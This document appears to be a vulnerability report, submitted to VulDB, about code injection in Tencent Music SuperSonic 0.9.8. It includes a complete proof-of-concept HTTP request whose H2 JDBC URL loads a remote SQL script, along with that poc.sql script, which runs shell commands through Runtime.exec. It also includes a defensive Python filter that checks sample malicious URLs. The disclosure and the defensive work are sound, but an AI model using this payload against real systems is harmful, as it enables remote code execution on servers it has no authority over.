| Field | Value |
|---|---|
| Title | tencentmusic supersonic 0.9.8 Code Injection |

### Description

Tencent’s Supersonic is a high-performance computing project focused on real-time data analysis and processing, primarily applied in big data, AI, and cloud computing domains.

### Vulnerability

An attacker could exploit this system by configuring a malicious H2 database connection string (e.g., via a management console) and triggering the /testConnect API endpoint. This would cause the server to execute attacker-controlled commands via the H2 database’s INIT parameter, ultimately leading to a Remote Code Execution (RCE) vulnerability.

### Poc 1

```
POST /api/semantic/database/testConnect HTTP/1.1
Host: 192.168.137.17:9080
Content-Length: 225
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJ0b2tlbl91c2VyX2VtYWlsIjoiYWRtaW5AeHguY29tIiwidG9rZW5fdXNlcl9pZCI6MSwidG9rZW5fdXNlcl9kaXNwbGF5X25hbWUiOiJhZG1pbiIsInRva2VuX2NyZWF0ZV90aW1lIjoxNzQyODY5MTkwMTc1LCJ0b2tlbl9pc19hZG1pbiI6MSwidG9rZW5fdXNlcl9uYW1lIjoiYWRtaW4iLCJ0b2tlbl91c2VyX3Bhc3N3b3JkIjoiYzNWd1pYSnpiMjVwWTBCaWFXTnZiZGt0SkpZV3c2QTNyRW1CVVB6Ym4vNkROZVluRCt5M21Bd0RLRU1TM0tWVCIsInN1YiI6ImFkbWluIiwiZXhwIjoxNzQyOTQxMTkwfQ.0RnVDV0MYCK_kP13sWJ6QLjRNCnI6t_CLIIw2qSK66DU39x0sSXagai-gRFuYhtrVRaw9XuYYn0f3fmY4r7Zbg
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json
auth: Bearer eyJhbGciOiJIUzUxMiJ9.eyJ0b2tlbl91c2VyX2VtYWlsIjoiYWRtaW5AeHguY29tIiwidG9rZW5fdXNlcl9pZCI6MSwidG9rZW5fdXNlcl9kaXNwbGF5X25hbWUiOiJhZG1pbiIsInRva2VuX2NyZWF0ZV90aW1lIjoxNzQyODY5MTkwMTc1LCJ0b2tlbl9pc19hZG1pbiI6MSwidG9rZW5fdXNlcl9uYW1lIjoiYWRtaW4iLCJ0b2tlbl91c2VyX3Bhc3N3b3JkIjoiYzNWd1pYSnpiMjVwWTBCaWFXTnZiZGt0SkpZV3c2QTNyRW1CVVB6Ym4vNkROZVluRCt5M21Bd0RLRU1TM0tWVCIsInN1YiI6ImFkbWluIiwiZXhwIjoxNzQyOTQxMTkwfQ.0RnVDV0MYCK_kP13sWJ6QLjRNCnI6t_CLIIw2qSK66DU39x0sSXagai-gRFuYhtrVRaw9XuYYn0f3fmY4r7Zbg
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Origin: http://192.168.137.17:9080
Referer: http://192.168.137.17:9080/webapp/database
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{"name":"111","type":"H2","admins":[],"viewers":[],"description":null,"url":"jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.137.5:8888/poc.sql'","username":"333","password":"","database":null}
```

We set up an HTTP server on 192.168.137.5:8888. Here is poc.sql's content:

```
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';CALL EXEC ('touch /tmp/pwneeeee')
```
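The root cause is that a user-supplied JDBC URL reaches the driver with its `;KEY=VALUE` settings intact, so H2's INIT runs arbitrary SQL at connect time. One check a defender would put in front of such a test-connection endpoint, written here as an added Python example (not code from the supersonic project, whose server is Java): it splits the H2 URL into settings, refuses INIT outright, and refuses any setting outside a small allowlist. The allowlist and the host name `attacker.example` are assumptions, not values from the report.

```python
"""Allowlist check for H2 JDBC URLs before a server runs a "test connection".

Added example, not code from the supersonic project. The allowlist and the
placeholder host attacker.example are assumptions, not values from the report.
"""
from urllib.parse import unquote

# Settings an operator plausibly needs for an H2 connection; anything else is refused.
SAFE_H2_SETTINGS = {"DB_CLOSE_DELAY", "MODE", "SCHEMA", "IFEXISTS", "AUTO_SERVER"}
# Settings that make the driver execute SQL or load code while connecting.
DANGEROUS_H2_SETTINGS = {"INIT"}


def check_h2_url(url: str) -> tuple[bool, str]:
    """Return (accepted, reason) for a jdbc:h2: URL supplied by a user."""
    # Decode percent-encoding defensively so an encoded ';' or '=' cannot hide a setting.
    decoded = unquote(url).strip()
    if not decoded.lower().startswith("jdbc:h2:"):
        return False, "only jdbc:h2: URLs are checked by this function"
    # H2 appends settings as ;KEY=VALUE after the database path; keys are case-insensitive.
    for raw in decoded.split(";")[1:]:
        if not raw.strip():
            continue
        key, _, value = raw.partition("=")
        key = key.strip().upper()
        if key in DANGEROUS_H2_SETTINGS:
            return False, f"{key} runs SQL on connect: {value.strip()!r}"
        if key not in SAFE_H2_SETTINGS:
            return False, f"setting {key} is not allowlisted"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the shape of the report's URL with a placeholder host, plus a benign one.
    samples = [
        "jdbc:h2:mem:testdb;INIT=RUNSCRIPT FROM 'http://attacker.example/poc.sql'",
        "jdbc:h2:mem:testdb;init=RUNSCRIPT FROM 'http://attacker.example/poc.sql'",
        "jdbc:h2:mem:testdb%3BINIT%3DRUNSCRIPT FROM 'http://attacker.example/poc.sql'",
        "jdbc:h2:mem:testdb;DB_CLOSE_DELAY=-1;MODE=MySQL",
    ]
    for sample in samples:
        print(sample, "->", check_h2_url(sample))
```

A URL filter is a stopgap; the durable fix is to build the connection from structured fields (host, database, credentials) chosen by the server rather than from a free-form JDBC URL.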
| Field | Value |
|---|---|
| Source | https://github.com/tencentmusic/supersonic/issues/2193 |
| User | startr4ck (UID 76213) |
| Submission | 25/03/2025 10:46 (1 year ago) |
| Moderation | 03/04/2025 09:11 (9 days later) |
| Status | Accepted |
| VulDB Entry | 303110 [Tencent Music Entertainment SuperSonic up to 0.9.8 H2 Database Connection testConnect privilege escalation] |
| Points | 20 |